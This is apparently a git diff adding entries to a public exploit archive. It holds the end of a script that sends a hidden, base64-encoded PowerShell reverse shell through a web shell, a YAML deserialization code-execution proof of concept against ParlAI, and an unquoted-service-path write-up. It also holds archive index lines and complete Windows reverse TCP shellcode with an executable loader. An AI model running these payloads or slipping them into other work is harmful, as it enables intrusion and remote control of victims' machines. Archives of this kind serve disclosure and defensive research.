revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\""
revshell = revshell.encode('ascii')
revshell = base64.b64encode(revshell)
revshell = revshell.decode('ascii')
connection = requests.get(URL+"/lol.php?cmd=" + revshell)
print("[+] Starting to listen on port " + rport)
time.sleep(0.5)
threading.Thread(target=shell, args=(rhost, rport)).start()
time.sleep(2)
print("[+] Sending the reverse shell payload")
threading.Thread(target=start_shell, args=(rhost, rport)).start()

49
exploits/python/local/50289.py Executable file
View file

@ -0,0 +1,49 @@
# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai
# Date: 2021-09-11
# Exploit Author: Abhiram V
# Vendor Homepage: https://parl.ai/
# Software Link: https://github.com/facebookresearch/ParlAI
# Version: < 1.1.0
# Tested on: Linux
# CVE: CVE-2021-24040
# References :
# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg
# | https://anon-artist.github.io/blogs/blog3.html |
############################################################################
Introduction
ParlAI (pronounced par-lay) is a free, open-source python framework for
sharing, training and evaluating AI models on a variety of openly available
dialogue datasets.
############################################################################
Vulnerability details
############################################################################
Description
ParlAI was vulnerable to YAML deserialization attack caused by unsafe
loading which leads to Arbitrary Code Execution.
Proof of Concept
Create the following PoC file (exploit.py)
import os
#os.system('pip3 install parlai')
from parlai.chat_service.utils import config
exploit = """!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(exploit)
config.parse_configuration_file('config.yml')
Execute the python script ie, python3 exploit.py
Impact
Code Execution
############################################################################

28
exploits/windows/local/50273.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Active WebCam 11.5 - Unquoted Service Path
# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io)
# Date: 09.09.2021
# Software Link: https://www.techspot.com/downloads/175-active-webcam.html
# Vendor Homepage: https://www.pysoft.com/
# Version: 11.5
# Tested on: Windows 10
# Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options
# Proof of Concept:
C:\Users\death>sc qc ACTIVEWEBCAM
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ACTIVEWEBCAM
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Active WebCam\WebCam.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Active WebCam
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Active WebCam ACTIVEWEBCAM C:\Program Files\Active WebCam\WebCam.exe Auto

17
files_exploits.csv
View file

@ -11385,6 +11385,9 @@ id,file,description,date,author,type,platform,port
50236,exploits/linux/local/50236.py,"MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)",1970-01-01,ninpwn,local,linux, 50236,exploits/linux/local/50236.py,"MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)",1970-01-01,ninpwn,local,linux,
50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",1970-01-01,Neurogenesia,local,hardware,
50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",1970-01-01,"Abhiram V",local,python,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18528,6 +18531,7 @@ id,file,description,date,author,type,platform,port
50160,exploits/hardware/remote/50160.txt,"Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)",1970-01-01,"Ivan Nikolsky",remote,hardware, 50160,exploits/hardware/remote/50160.txt,"Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)",1970-01-01,"Ivan Nikolsky",remote,hardware,
50170,exploits/java/remote/50170.java,"Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)",1970-01-01,"Christopher Ellis",remote,java, 50170,exploits/java/remote/50170.java,"Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)",1970-01-01,"Christopher Ellis",remote,java,
50216,exploits/linux/remote/50216.py,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",1970-01-01,"Khaled Salem",remote,linux, 50216,exploits/linux/remote/50216.py,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",1970-01-01,"Khaled Salem",remote,linux,
50282,exploits/hardware/remote/50282.txt,"ECOA Building Automation System - Hard-coded Credentials SSH Access",1970-01-01,Neurogenesia,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44394,3 +44398,16 @@ id,file,description,date,author,type,platform,port
50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php, 50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php,
50270,exploits/php/webapps/50270.txt,"WordPress Plugin TablePress 1.14 - CSV Injection",1970-01-01,"Nikhil Kapoor",webapps,php, 50270,exploits/php/webapps/50270.txt,"WordPress Plugin TablePress 1.14 - CSV Injection",1970-01-01,"Nikhil Kapoor",webapps,php,
50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",1970-01-01,"Emre Aslan",webapps,php, 50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",1970-01-01,"Emre Aslan",webapps,php,
50274,exploits/php/webapps/50274.txt,"Men Salon Management System 1.0 - Multiple Vulnerabilities",1970-01-01,"Aryan Chehreghani",webapps,php,
50275,exploits/hardware/webapps/50275.txt,"ECOA Building Automation System - Weak Default Credentials",1970-01-01,Neurogenesia,webapps,hardware,
50276,exploits/hardware/webapps/50276.txt,"ECOA Building Automation System - Path Traversal Arbitrary File Upload",1970-01-01,Neurogenesia,webapps,hardware,
50277,exploits/hardware/webapps/50277.txt,"ECOA Building Automation System - Directory Traversal Content Disclosure",1970-01-01,Neurogenesia,webapps,hardware,
50278,exploits/hardware/webapps/50278.txt,"ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,Neurogenesia,webapps,hardware,
50279,exploits/hardware/webapps/50279.txt,"ECOA Building Automation System - Cookie Poisoning Authentication Bypass",1970-01-01,Neurogenesia,webapps,hardware,
50280,exploits/hardware/webapps/50280.txt,"ECOA Building Automation System - Configuration Download Information Disclosure",1970-01-01,Neurogenesia,webapps,hardware,
50281,exploits/hardware/webapps/50281.txt,"ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function",1970-01-01,Neurogenesia,webapps,hardware,
50284,exploits/hardware/webapps/50284.txt,"ECOA Building Automation System - Remote Privilege Escalation",1970-01-01,Neurogenesia,webapps,hardware,
50285,exploits/hardware/webapps/50285.txt,"ECOA Building Automation System - Local File Disclosure",1970-01-01,Neurogenesia,webapps,hardware,
50286,exploits/hardware/webapps/50286.txt,"ECOA Building Automation System - Arbitrary File Deletion",1970-01-01,Neurogenesia,webapps,hardware,
50287,exploits/php/webapps/50287.py,"Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,
50288,exploits/php/webapps/50288.py,"Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE",1970-01-01,mari0x00,webapps,php,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -1041,3 +1041,4 @@ id,file,description,date,author,type,platform
50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",1970-01-01,d7x,shellcode,linux_x86 50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",1970-01-01,d7x,shellcode,linux_x86
50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86 50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86
50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86 50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86
50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64

1 id file description date author type platform
1041 50124 shellcodes/linux_x86/50124.c Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) 1970-01-01 d7x shellcode linux_x86
1042 50125 shellcodes/linux_x86/50125.c Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) 1970-01-01 d7x shellcode linux_x86
1043 50141 shellcodes/linux_x86/50141.c Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode 1970-01-01 d7x shellcode linux_x86
1044 50291 shellcodes/windows_x86-64/50291.c Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes) 1970-01-01 Xenofon Vassilakopoulos shellcode windows_x86-64

290
shellcodes/windows_x86-64/50291.c Normal file
View file

@ -0,0 +1,290 @@
# Title: Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
# Date: 09.12.2021
# Author: Xenofon Vassilakopoulos
# Tested on: Windows/x64 - 10.0.19043 N/A Build 19043
/*
MIT License
Copyright (c) 2021 Xenofon Vassilakopoulos
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
[BITS 32]
global _start
section .text
_start:
; Locate Kernelbase.dll address
XOR ECX, ECX ;zero out ECX
MOV EAX, FS:[ecx + 0x30] ;EAX = PEB
MOV EAX, [EAX + 0x0c] ;EAX = PEB->Ldr
MOV ESI, [EAX + 0x14] ;ESI = PEB->Ldr.InMemoryOrderModuleList
LODSD ;memory address of the second list entry structure
XCHG EAX, ESI ;EAX = ESI , ESI = EAX
LODSD ;memory address of the third list entry structure
XCHG EAX, ESI ;EAX = ESI , ESI = EAX
LODSD ;memory address of the fourth list entry structure
MOV EBX, [EAX + 0x10] ;EBX = Base address
; Export Table
MOV EDX, DWORD [EBX + 0x3C] ;EDX = DOS->e_lfanew
ADD EDX, EBX ;EDX = PE Header
MOV EDX, DWORD [EDX + 0x78] ;EDX = Offset export table
ADD EDX, EBX ;EDX = Export table
MOV ESI, DWORD [EDX + 0x20] ;ESI = Offset names table
ADD ESI, EBX ;ESI = Names table
XOR ECX, ECX ;EXC = 0
GetFunction :
INC ECX; increment counter
LODSD ;Get name offset
ADD EAX, EBX ;Get function name
CMP dword [EAX], 0x50746547 ;"PteG"
JNZ SHORT GetFunction ;jump to GetFunction label if not "GetP"
CMP dword [EAX + 0x4], 0x41636F72 ;"rocA"
JNZ SHORT GetFunction ;jump to GetFunction label if not "rocA"
CMP dword [EAX + 0x8], 0x65726464 ;"ddre"
JNZ SHORT GetFunction ;jump to GetFunction label if not "ddre"
MOV ESI, DWORD [EDX + 0x24] ;ESI = Offset ordinals
ADD ESI, EBX ;ESI = Ordinals table
MOV CX, WORD [ESI + ECX * 2] ;CX = Number of function
DEC ECX ;Decrement the ordinal
MOV ESI, DWORD [EDX + 0x1C] ;ESI = Offset address table
ADD ESI, EBX ;ESI = Address table
MOV EDX, DWORD [ESI + ECX * 4] ;EDX = Pointer(offset)
ADD EDX, EBX ;EDX = GetProcAddress
; Get the Address of LoadLibraryA function
XOR ECX, ECX ;ECX = 0
PUSH EBX ;Kernel32 base address
PUSH EDX ;GetProcAddress
PUSH ECX ;0
PUSH 0x41797261 ;"Ayra"
PUSH 0x7262694C ;"rbiL"
PUSH 0x64616F4C ;"daoL"
PUSH ESP ;"LoadLibrary"
PUSH EBX ;Kernel32 base address
MOV ESI, EBX ;save the kernel32 address in esi for later
CALL EDX ;GetProcAddress(LoadLibraryA)
ADD ESP, 0xC ;pop "LoadLibraryA"
POP EDX ;EDX = 0
PUSH EAX ;EAX = LoadLibraryA
PUSH EDX ;ECX = 0
MOV DX, 0x6C6C ;"ll"
PUSH EDX
PUSH 0x642E3233 ;"d.23"
PUSH 0x5F327377 ;"_2sw"
PUSH ESP ;"ws2_32.dll"
CALL EAX ;LoadLibrary("ws2_32.dll")
ADD ESP, 0x10 ;Clean stack
MOV EDX, [ESP + 0x4] ;EDX = GetProcAddress
PUSH 0x61617075 ;"aapu"
SUB word [ESP + 0x2], 0x6161 ;"pu" (remove "aa")
PUSH 0x74726174 ;"trat"
PUSH 0x53415357 ;"SASW"
PUSH ESP ;"WSAStartup"
PUSH EAX ;ws2_32.dll address
MOV EDI, EAX ;save ws2_32.dll to use it later
CALL EDX ;GetProcAddress(WSAStartup)
; Call WSAStartUp
XOR EBX, EBX ;zero out ebx register
MOV BX, 0x0190 ;EAX = sizeof(struct WSAData)
SUB ESP, EBX ;allocate space for the WSAData structure
PUSH ESP ;push a pointer to WSAData structure
PUSH EBX ;Push EBX as wVersionRequested
CALL EAX ;Call WSAStartUp
;Find the address of WSASocketA
ADD ESP, 0x10 ;Align the stack
XOR EBX, EBX ;zero out the EBX register
ADD BL, 0x4 ;add 0x4 at the lower register BL
IMUL EBX, 0x64 ;EBX = 0x190
MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
PUSH 0x61614174 ;"aaAt"
SUB word [ESP + 0x2], 0x6161 ;"At" (remove "aa")
PUSH 0x656b636f ;"ekco"
PUSH 0x53415357 ;"SASW"
PUSH ESP ;"WSASocketA", GetProcAddress 2nd argument
MOV EAX, EDI ;EAX now holds the ws2_32.dll address
PUSH EAX ;push the first argument of GetProcAddress
CALL EDX ;call GetProcAddress
PUSH EDI ;save the ws2_32.dll address to use it later
;call WSASocketA
XOR ECX, ECX ;zero out ECX register
PUSH EDX ;null value for dwFlags argument
PUSH EDX ;zero value since we dont have an existing socket group
PUSH EDX ;null value for lpProtocolInfo
MOV DL, 0x6 ;IPPROTO_TCP
PUSH EDX ;set the protocol argument
INC ECX ;SOCK_STREAM(TCP)
PUSH ECX ;set the type argument
INC ECX ;AF_INET(IPv4)
PUSH ECX ;set the ddress family specification argument
CALL EAX ;call WSASocketA
XCHG EAX, ECX ;save the socket returned from WSASocketA at EAX to ECX in order to use it later
;Find the address of connect
POP EDI ;load previously saved ws2_32.dll address to ECX
ADD ESP, 0x10 ;Align stack
XOR EBX, EBX ;zero out EBX
ADD BL, 0x4 ;add 0x4 to lower register BL
IMUL EBX, 0x63 ;EBX = 0x18c
MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
PUSH 0x61746365 ;"atce"
SUB word [ESP + 0x3], 0x61 ;"tce" (remove "a")
PUSH 0x6e6e6f63 ;"nnoc"
PUSH ESP ;"connect", second argument of GetProcAddress
PUSH EDI ;ws32_2.dll address, first argument of GetProcAddress
XCHG ECX, EBP
CALL EDX ;call GetProcAddress
;call connect
PUSH 0x0bc9a8c0 ;sin_addr set to 192.168.201.11
PUSH word 0x5c11 ;port = 4444
XOR EBX, EBX ;zero out EBX
add BL, 0x2 ;TCP protocol
PUSH word BX ;push the protocol value on the stack
MOV EDX, ESP ;pointer to sockaddr structure (IP,Port,Protocol)
PUSH byte 16 ;the size of sockaddr - 3rd argument of connect
PUSH EDX ;push the sockaddr - 2nd argument of connect
PUSH EBP ;socket descriptor = 64 - 1st argument of connect
XCHG EBP, EDI
CALL EAX ;execute connect;
;Find the address of CreateProcessA
ADD ESP, 0x14 ;Clean stack
XOR EBX, EBX ;zero out EBX
ADD BL, 0x4 ;add 0x4 to lower register BL
IMUL EBX, 0x62 ;EBX = 0x194
MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
PUSH 0x61614173 ;"aaAs"
SUB dword [ESP + 0x2], 0x6161 ;"As"
PUSH 0x7365636f ;"seco"
PUSH 0x72506574 ;"rPet"
PUSH 0x61657243 ;"aerC"
PUSH ESP ;"CreateProcessA" - 2nd argument of GetProcAddress
MOV EBP, ESI ;move the kernel32.dll to EBP
PUSH EBP ;kernel32.dll address - 1st argument of GetProcAddress
CALL EDX ;execute GetProcAddress
PUSH EAX ;address of CreateProcessA
LEA EBP, [EAX] ;EBP now points to the address of CreateProcessA
;call CreateProcessA
PUSH 0x61646d63 ;"admc"
SUB word [ESP + 0x3], 0x61 ;"dmc" ( remove a)
MOV ECX, ESP ;ecx now points to "cmd" string
XOR EDX, EDX ;zero out EDX
SUB ESP, 16
MOV EBX, esp ;pointer for ProcessInfo
;STARTUPINFOA struct
PUSH EDI ;hStdError => saved socket
PUSH EDI ;hStdOutput => saved socket
PUSH EDI ;hStdInput => saved socket
PUSH EDX ;lpReserved2 => NULL
PUSH EDX ;cbReserved2 => NULL
XOR EAX, EAX ;zero out EAX register
INC EAX ;EAX => 0x00000001
ROL EAX, 8 ;EAX => 0x00000100
PUSH EAX ;dwFlags => STARTF_USESTDHANDLES 0x00000100
PUSH EDX ;dwFillAttribute => NULL
PUSH EDX ;dwYCountChars => NULL
PUSH EDX ;dwXCountChars => NULL
PUSH EDX ;dwYSize => NULL
PUSH EDX ;dwXSize => NULL
PUSH EDX ;dwY => NULL
PUSH EDX ;dwX => NULL
PUSH EDX ;pTitle => NULL
PUSH EDX ;pDesktop => NULL
PUSH EDX ;pReserved => NULL
XOR EAX, EAX ;zero out EAX
ADD AL, 44 ;cb => 0x44 (size of struct)
PUSH EAX ;eax points to STARTUPINFOA
;ProcessInfo struct
MOV EAX, ESP ;pStartupInfo
PUSH EBX ;pProcessInfo
PUSH EAX ;pStartupInfo
PUSH EDX ;CurrentDirectory => NULL
PUSH EDX ;pEnvironment => NULL
PUSH EDX ;CreationFlags => 0
XOR EAX, EAX ;zero out EAX register
INC EAX ;EAX => 0x00000001
PUSH EAX ;InheritHandles => TRUE => 1
PUSH EDX ;pThreadAttributes => NULL
PUSH EDX ;pProcessAttributes => NULL
PUSH ECX ;pCommandLine => pointer to "cmd"
PUSH EDX ;ApplicationName => NULL
CALL EBP ;execute CreateProcessA
*/
#include <windows.h>
#include <iostream>
#include <stdlib.h>
char code[] =
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b"
"\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31"
"\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f"
"\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde"
"\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53"
"\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54"
"\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33"
"\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04"
"\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68"
"\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc"
"\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c"
"\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68"
"\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06"
"\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b"
"\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63"
"\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c"
"\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83"
"\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61"
"\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72"
"\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64"
"\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57"
"\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52"
"\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50"
"\x52\x52\x51\x52\xff\xd5";
int main(int argc, char** argv)
{
//HWND hWnd = GetConsoleWindow();
//ShowWindow(hWnd, SW_HIDE);
printf("Shellcode Length: %d\n", strlen(code));
void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, code, sizeof(code));
((void(*)())exec)();
return 0;
}